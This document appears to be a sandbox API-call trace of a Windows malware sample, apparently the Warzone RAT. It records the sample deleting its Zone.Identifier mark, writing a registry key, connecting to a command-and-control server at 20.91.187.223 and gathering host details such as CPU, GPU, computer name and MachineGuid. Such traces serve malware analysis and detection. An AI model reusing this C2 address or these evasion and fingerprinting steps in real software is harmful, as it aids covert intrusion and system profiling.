[0199.653] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x7d0) returned 0x7dca20
[0199.653] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7dca20, nSize=0x3e8 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")) returned 0x62
[0199.653] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe") returned 98
[0199.653] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0199.653] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe") returned 98
[0199.653] lstrcpyW (in: lpString1=0x2a10000, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
[0199.654] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe") returned 98
[0199.654] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x2a20000
[0199.654] lstrcpyW (in: lpString1=0x2a20000, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
[0199.654] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.655] GetProcessHeap () returned 0x7c0000
[0199.656] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dca20 | out: hHeap=0x7c0000) returned 1
[0199.657] GetProcessHeap () returned 0x7c0000
[0199.657] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0xa) returned 0x7cbb30
[0199.657] lstrlenA (lpString="bAAJchric") returned 9
[0199.657] lstrlenA (lpString="bAAJchric") returned 9
[0199.657] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0199.657] lstrcpyA (in: lpString1=0x2a10000, lpString2="bAAJchric" | out: lpString1="bAAJchric") returned="bAAJchric"
[0199.657] lstrlenA (lpString="bAAJchric") returned 9
[0199.657] lstrlenA (lpString="bAAJchric") returned 9
[0199.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2a10000, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
[0199.657] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0199.657] lstrlenA (lpString="bAAJchric") returned 9
[0199.657] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a10000, cbMultiByte=-1, lpWideCharStr=0x2a30000, cchWideChar=22 | out: lpWideCharStr="bAAJchric") returned 10
[0199.658] lstrlenW (lpString="bAAJchric") returned 9
[0199.658] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2a40000
[0199.658] lstrlenW (lpString="bAAJchric") returned 9
[0199.658] lstrcpyW (in: lpString1=0x2a40000, lpString2="bAAJchric" | out: lpString1="bAAJchric") returned="bAAJchric"
[0199.658] lstrlenW (lpString="bAAJchric") returned 9
[0199.658] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2a50000
[0199.658] lstrcpyW (in: lpString1=0x2a50000, lpString2="bAAJchric" | out: lpString1="bAAJchric") returned="bAAJchric"
[0199.658] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.659] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.660] lstrlenW (lpString="bAAJchric") returned 9
[0199.660] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0199.660] lstrcatW (in: lpString1="", lpString2="bAAJchric" | out: lpString1="bAAJchric") returned="bAAJchric"
[0199.660] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.661] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.661] GetProcessHeap () returned 0x7c0000
[0199.661] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbb30 | out: hHeap=0x7c0000) returned 1
[0199.661] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\BS8JRXAM5E", Reserved=0x0, lpClass=0x0, dwOptions=0x1, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x19f950, lpdwDisposition=0x19f864 | out: phkResult=0x19f950*=0x298, lpdwDisposition=0x19f864*=0x1) returned 0x0
[0199.662] RegCloseKey (hKey=0x298) returned 0x0
[0199.662] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\BS8JRXAM5E", ulOptions=0x0, samDesired=0xf003f, phkResult=0x19f950 | out: phkResult=0x19f950*=0x298) returned 0x0
[0199.662] lstrlenW (lpString=0x0) returned 0
[0199.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0199.662] lstrlenW (lpString=0x0) returned 0
[0199.662] lstrcpyW (in: lpString1=0x2a10000, lpString2=0x0 | out: lpString1="") returned 0x0
[0199.663] lstrlenW (lpString=":Zone.Identifier") returned 16
[0199.663] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2a40000
[0199.663] lstrlenW (lpString=":Zone.Identifier") returned 16
[0199.663] lstrcpyW (in: lpString1=0x2a40000, lpString2=":Zone.Identifier" | out: lpString1=":Zone.Identifier") returned=":Zone.Identifier"
[0199.663] lstrlenW (lpString=":Zone.Identifier") returned 16
[0199.663] lstrlenW (lpString="") returned 0
[0199.663] VirtualQuery (in: lpAddress=0x2a10000, lpBuffer=0x19f82c, dwLength=0x1c | out: lpBuffer=0x19f82c*(BaseAddress=0x2a10000, AllocationBase=0x2a10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0199.663] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2a50000
[0199.664] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.664] lstrcatW (in: lpString1="", lpString2=":Zone.Identifier" | out: lpString1=":Zone.Identifier") returned=":Zone.Identifier"
[0199.664] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.665] DeleteFileW (lpFileName=":Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\:zone.identifier")) returned 0
[0199.665] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.666] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.666] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.666] lstrlenW (lpString="20.91.187.223") returned 13
[0199.666] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0199.667] lstrcpyW (in: lpString1=0x2a10000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.667] lstrlenW (lpString="20.91.187.223") returned 13
[0199.667] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a20000
[0199.667] lstrcpyW (in: lpString1=0x2a20000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.667] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0199.667] lstrlenW (lpString="20.91.187.223") returned 13
[0199.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="20.91.187.223", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0199.667] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2a40000
[0199.668] lstrlenW (lpString="20.91.187.223") returned 13
[0199.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="20.91.187.223", cchWideChar=13, lpMultiByteStr=0x2a40000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20.91.187.223", lpUsedDefaultChar=0x0) returned 13
[0199.668] lstrlenA (lpString="20.91.187.223") returned 13
[0199.668] lstrlenA (lpString="20.91.187.223") returned 13
[0199.668] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2a50000
[0199.668] lstrcpyA (in: lpString1=0x2a50000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.668] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.669] lstrlenA (lpString="20.91.187.223") returned 13
[0199.669] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0199.669] lstrcatA (in: lpString1="", lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.669] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.669] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.670] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.670] lstrlenA (lpString="20.91.187.223") returned 13
[0199.670] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.670] lstrcatA (in: lpString1="", lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.670] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0xffffffff) returned 0x0
[0199.670] getaddrinfo (in: pNodeName="20.91.187.223", pServiceName=0x0, pHints=0x19f874*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f894 | out: ppResult=0x19f894*=0x7dc8c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cbb30*(sa_family=2, sin_port=0x0, sin_addr="20.91.187.223"), ai_next=0x0)) returned 0
[0199.818] socket (af=2, type=1, protocol=0) returned 0x290
[0200.533] htons (hostshort=0x164b) returned 0x4b16
[0200.533] FreeAddrInfoW (pAddrInfo=0x7dc8c0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cbb30*(sa_family=2, sin_port=0x0, sin_addr="20.91.187.223"), ai_next=0x0))
[0200.534] connect (s=0x290, name=0x19feac*(sa_family=2, sin_port=0x164b, sin_addr="20.91.187.223"), namelen=16) returned 0
[0200.581] ReleaseMutex (hMutex=0x288) returned 1
[0200.581] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.582] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.583] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.585] setsockopt (s=0x290, level=65535, optname=4102, optval="`ê", optlen=4) returned 0
[0200.586] lstrlenA (lpString="warzone160") returned 10
[0200.586] lstrlenA (lpString="warzone160") returned 10
[0200.586] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0200.586] lstrcpyA (in: lpString1=0x2a10000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160"
[0200.586] lstrlenA (lpString="warzone160") returned 10
[0200.586] GetProcessHeap () returned 0x7c0000
[0200.586] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb) returned 0x7cb920
[0200.586] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.587] recv (in: s=0x290, buf=0x18f860, len=12, flags=0 | out: buf=0x18f860*) returned 12
[0200.623] GetProcessHeap () returned 0x7c0000
[0200.623] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbb30
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc38
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb) returned 0x7cbc50
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc20
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc68
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc20 | out: hHeap=0x7c0000) returned 1
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc50 | out: hHeap=0x7c0000) returned 1
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc38 | out: hHeap=0x7c0000) returned 1
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc68 | out: hHeap=0x7c0000) returned 1
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbb30 | out: hHeap=0x7c0000) returned 1
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbb30
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc80
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb) returned 0x7cbbd8
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc98
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbbf0
[0200.624] GetProcessHeap () returned 0x7c0000
[0200.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc98 | out: hHeap=0x7c0000) returned 1
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbbd8 | out: hHeap=0x7c0000) returned 1
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc80 | out: hHeap=0x7c0000) returned 1
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xc) returned 0x7cbc08
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbb30 | out: hHeap=0x7c0000) returned 1
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbbf0 | out: hHeap=0x7c0000) returned 1
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x0) returned 0x7ecca0
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x4) returned 0x7ecdd0
[0200.625] GetProcessHeap () returned 0x7c0000
[0200.625] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x200) returned 0x7e8418
[0200.625] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.625] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.625] VirtualAlloc (lpAddress=0x0, dwSize=0x27, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0200.626] lstrcpyA (in: lpString1=0x2a10000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz"
[0200.626] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.626] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2a10000, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41
[0200.626] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2a20000
[0200.626] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.626] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a10000, cbMultiByte=-1, lpWideCharStr=0x2a20000, cchWideChar=82 | out: lpWideCharStr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 40
[0200.626] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.626] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0200.627] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.627] lstrcpyW (in: lpString1=0x2a30000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz"
[0200.627] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0200.627] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2a40000
[0200.627] lstrcpyW (in: lpString1=0x2a40000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz"
[0200.627] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.628] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.629] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0200.631] GetProcessHeap () returned 0x7c0000
[0200.631] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e8418 | out: hHeap=0x7c0000) returned 1
[0200.631] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0200.678] CoInitialize (pvReserved=0x0) returned 0x1
[0200.678] CoCreateInstance (in: rclsid=0x414490*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x416e60*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18f484 | out: ppv=0x18f484*=0x7eccd0) returned 0x0
[0201.215] WbemLocator:IWbemLocator:ConnectServer (in: This=0x7eccd0, strNetworkResource="root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18f478 | out: ppNamespace=0x18f478*=0x7e9128) returned 0x0
[0206.536] IWbemServices:ExecQuery (in: This=0x7e9128, strQueryLanguage="", strQuery="", lFlags=32, pCtx=0x0, ppEnum=0x18f47c | out: ppEnum=0x18f47c*=0x7f70a0) returned 0x0
[0207.634] IEnumWbemClassObject:Next (in: This=0x7f70a0, lTimeout=-1, uCount=0x1, apObjects=0x18f480, puReturned=0x18f474 | out: apObjects=0x18f480*=0x7f7660, puReturned=0x18f474*=0x1) returned 0x0
[0209.041] IWbemClassObject:Get (in: This=0x7f7660, wszName="Name", lFlags=0, pVal=0x18f460*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f460*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) HD Graphics 630", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0209.042] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.042] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x2a10000
[0209.043] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.043] lstrcpyW (in: lpString1=0x2a10000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630"
[0209.043] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f6a8, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")) returned 0x62
[0209.043] GetProcessHeap () returned 0x7c0000
[0209.043] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x400000) returned 0x2e1d020
[0209.101] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334
[0209.101] GetFileSize (in: hFile=0x334, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd2a00
[0209.101] ReadFile (in: hFile=0x334, lpBuffer=0x2e1d020, nNumberOfBytesToRead=0xd2a00, lpNumberOfBytesRead=0x18f484, lpOverlapped=0x0 | out: lpBuffer=0x2e1d020*, lpNumberOfBytesRead=0x18f484*=0xd2a00, lpOverlapped=0x0) returned 1
[0209.116] CloseHandle (hObject=0x334) returned 1
[0209.140] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.140] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x2a20000
[0209.141] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.141] lstrcpyW (in: lpString1=0x2a20000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630"
[0209.141] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0209.141] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2a30000
[0209.141] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0209.141] lstrcpyW (in: lpString1=0x2a30000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz"
[0209.141] GlobalMemoryStatusEx (in: lpBuffer=0x18f440 | out: lpBuffer=0x18f440) returned 1
[0209.141] lstrlenW (lpString="") returned 0
[0209.141] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x3220000
[0209.141] lstrlenW (lpString="") returned 0
[0209.141] lstrcpyW (in: lpString1=0x3220000, lpString2="" | out: lpString1="") returned=""
[0209.141] GetComputerNameW (in: lpBuffer=0x18f44c, nSize=0x18f46c | out: lpBuffer="XC64ZB", nSize=0x18f46c) returned 1
[0209.141] lstrlenW (lpString="XC64ZB") returned 6
[0209.141] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3230000
[0209.142] lstrlenW (lpString="XC64ZB") returned 6
[0209.142] lstrcpyW (in: lpString1=0x3230000, lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB"
[0209.142] GetCurrentProcess () returned 0xffffffff
[0209.142] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000
[0209.142] GetProcAddress (hModule=0x76720000, lpProcName="IsWow64Process") returned 0x76739f10
[0209.142] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f460 | out: Wow64Process=0x18f460*=1) returned 1
[0209.142] GetCurrentProcess () returned 0xffffffff
[0209.142] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f468 | out: TokenHandle=0x18f468*=0x334) returned 1
[0209.142] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x14, TokenInformation=0x18f460, TokenInformationLength=0x4, ReturnLength=0x18f464 | out: TokenInformation=0x18f460, ReturnLength=0x18f464) returned 1
[0209.142] CloseHandle (hObject=0x334) returned 1
[0209.142] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000
[0209.143] GetProcAddress (hModule=0x771d0000, lpProcName="RtlGetVersion") returned 0x7722dbb0
[0209.143] RtlGetVersion (in: lpVersionInformation=0x18f34c | out: lpVersionInformation=0x18f34c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0
[0209.143] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31
[0209.143] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x3240000
[0209.143] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31
[0209.143] lstrcpyW (in: lpString1=0x3240000, lpString2="SOFTWARE\\Microsoft\\Cryptography" | out: lpString1="SOFTWARE\\Microsoft\\Cryptography") returned="SOFTWARE\\Microsoft\\Cryptography"
[0209.143] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x18f454 | out: phkResult=0x18f454*=0x334) returned 0x0
[0209.143] VirtualFree (lpAddress=0x3240000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.143] lstrlenW (lpString="MachineGuid") returned 11
[0209.143] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3240000
[0209.145] lstrlenW (lpString="MachineGuid") returned 11
